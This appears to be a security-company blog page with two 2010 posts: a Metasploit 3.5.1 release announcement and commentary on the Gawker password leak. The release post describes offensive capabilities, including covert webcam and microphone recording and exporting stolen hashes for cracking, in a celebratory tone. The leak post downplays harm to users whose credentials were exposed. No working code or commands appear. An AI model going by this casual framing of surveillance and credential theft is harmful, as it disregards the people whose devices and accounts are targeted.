Network boundaries for project members





If you haven’t tried Metasploit Pro yet, get your free, fully featured Metasploit Pro trial.

Originally Posted by egypt



Rapid7 and the Metasploit Project are proud to announce version 3.5.1 of the Metasploit Framework!  This minor version release adds 47 new modules, including exploit covereage for recent bugs in the news: Exim4, Internet Explorer, and ProFTPd.  Java payloads have seen significant improvement and java_signed_applet can now use them for complete cross-platform no-exploit-required pwnage.  Eight new meterpreter scripts were added, including smartlocker and schelevator, an exploit for the 0-day privilege escalation used by stuxnet.  Meterpreter itself now has support for remotely turning on and recording from webcams and microphones, completely in memory.  You can now export stolen hashes in John the Ripper and pwdump formats, facilitating cracking with standard tools.  PCAP support has been added to db_import allowing you to pull in hosts and services without sending a single packet.


Development continues at break-neck speed with around 45 tickets closed since the last release.  This graph, from, summarizes the framework's increased pace quite well.




For this release, we've added a Linux installer that bundles Java and PostgreSQL.  Now you can run msfgui and use a database connection out of the box with zero configuration on Linux and Windows.  The new installers use a gui to ask you where to install, so for headless installations you can run them with "--mode text" to keep everything in a shell, or just accept all of the defaults with "--mode unattended".


For more details, see the full 3.5.1 release notes.  As always, the latest version is available from the Metasploit download page.

Semipublic Password Dumps

Posted by rapid7-admin Dec 13, 2010

Originally Posted by todb



I woke up this morning to find reddits abuzz with the latest password dump, this time from Gawker and related properties. The splashy headline is usually something around "1.3 million Gawker passwords leaked." I wanted to write a couple words here since the areas of credential management, password complexity, and attack mitigation are all near and dear to my heart.


Firstly, the "1.3 million passwords" figure is a little bit of a misnomer. There are a bunch of files floating around the torrent sites, one of which is, indeed, a "full" database dump of usernames, encrypted passwords, and e-mail addresses. That file is 1,247,894 lines. Trouble is, the raw data isn't normalized at all, and so there are actually right around a half million e-mail addresses, and something close to ~200k complete username + password + e-mail address credentials. That all said, the data most people are actually looking at today is 188,281 credentials strong, which is the pre-cracked list of credentials distributed with the drop (one exception are the guys at Duo Security, who are cracking the DES-encrypted passwords independently).


Secondly, these passwords, in the main, are not very high value, which is assuredly one reason why they were released. In very modern jurisdictions like California and the EU, the leak of e-mail addresses is much more serious. These passwords are just not that big of a deal, since they're used for by people to comment on celebrity gossip, so these kinds of throwaway credentials are pretty common for public blogs.


This reminds me of something that a pen-test friend once said -- while "password" and "123456" are pretty common tokens on the Internet -- just look at the SkullSecurity lists. However, you find them a whole lot less on intranets, since your company's administrator is probably enforcing some kind of complexity and rotation policy. For internal networks, you find dates and days of the week a lot more often as passwords, since something like "Dec-13-2010" meets most complexity requirements and is really easy to rotate on a schedule.


Of course, some of these are (were) legit passwords that will (did) work against Twitter, Facebook, and e-mail accounts with the same username, but I wouldn't get all apoplectic over them. Rest assured, of the passwords that also work (worked) for e-mail addresses have almost certainly already been compromised. Two hundred thousand credentials is not all that hard to churn through with even college-kid resources.


Finally, the password dump itself is, while headline-grabbing, less interesting to incident response and computer forensics dorks than the clues in the collateral files as to how the attackers got access in the first place. It looks like it's a pretty typical PHP attack vector, and, as Egyp7 once quipped, "PHP is a virtual machine for shellcode." Clearly, some level of source code security auditing would have gone a long way to help Gawker avoid these headlines today. In addition, there's the whole secondary story that the attackers also gained access to Gawker's content management system (CMS). This is a huge deal -- like most purely online businesses, Gawker takes their code's secrecy pretty seriously.


At any rate, public dumps of actual passwords like these are always interesting from a research perspective -- it's nice to have the opportunity to check in on the current state of throwaway accounts. While this all sucks for Gawker, the security community benefits from large-ish datasets like this, since papers get written and there are renewed pushes for proper encryption of stored passwords and passwordless authentication schemes. Hopefully, the overall security posture of the Internet ends up improved.

Filter Blog

By date: By tag: